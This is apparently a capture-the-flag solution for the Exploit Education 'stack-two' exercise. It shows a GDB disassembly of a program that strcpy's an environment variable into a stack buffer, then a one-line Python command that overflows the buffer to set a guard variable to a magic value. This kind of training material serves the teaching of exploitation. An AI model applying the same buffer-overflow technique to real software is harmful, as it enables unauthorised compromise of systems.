gef⤠disas main
Dump of assembler code for function main:
0x00000000004006ad <+0>: push rbp
0x00000000004006ae <+1>: mov rbp,rsp
0x00000000004006b1 <+4>: sub rsp,0x60
0x00000000004006b5 <+8>: mov DWORD PTR [rbp-0x54],edi
0x00000000004006b8 <+11>: mov QWORD PTR [rbp-0x60],rsi
0x00000000004006bc <+15>: mov edi,0x400790
0x00000000004006c1 <+20>: call 0x400500 <puts@plt>
0x00000000004006c6 <+25>: mov edi,0x4007da
0x00000000004006cb <+30>: call 0x4004f0 <getenv@plt>
0x00000000004006d0 <+35>: mov QWORD PTR [rbp-0x8],rax
0x00000000004006d4 <+39>: cmp QWORD PTR [rbp-0x8],0x0
0x00000000004006d9 <+44>: jne 0x4006ef <main+66>
0x00000000004006db <+46>: mov esi,0x4007f0
0x00000000004006e0 <+51>: mov edi,0x1
0x00000000004006e5 <+56>: mov eax,0x0
0x00000000004006ea <+61>: call 0x400510 <errx@plt>
0x00000000004006ef <+66>: mov DWORD PTR [rbp-0x10],0x0
0x00000000004006f6 <+73>: mov rdx,QWORD PTR [rbp-0x8]
0x00000000004006fa <+77>: lea rax,[rbp-0x50]
0x00000000004006fe <+81>: mov rsi,rdx
0x0000000000400701 <+84>: mov rdi,rax
0x0000000000400704 <+87>: call 0x4004d0 <strcpy@plt>
0x0000000000400709 <+92>: mov eax,DWORD PTR [rbp-0x10]
0x000000000040070c <+95>: cmp eax,0xd0a090a
0x0000000000400711 <+100>: jne 0x40071f <main+114>
0x0000000000400713 <+102>: mov edi,0x400828
0x0000000000400718 <+107>: call 0x400500 <puts@plt>
0x000000000040071d <+112>: jmp 0x400733 <main+134>
0x000000000040071f <+114>: mov eax,DWORD PTR [rbp-0x10]
0x0000000000400722 <+117>: mov esi,eax
0x0000000000400724 <+119>: mov edi,0x400870
0x0000000000400729 <+124>: mov eax,0x0
0x000000000040072e <+129>: call 0x4004e0 <printf@plt>
0x0000000000400733 <+134>: mov edi,0x0
0x0000000000400738 <+139>: call 0x400520 <exit@plt>
End of assembler dump.
ExploitEducation=`python -c 'print "A"*(0x50-0x10) + "\x0a\x09\x0a\x0d"'` ./stack-two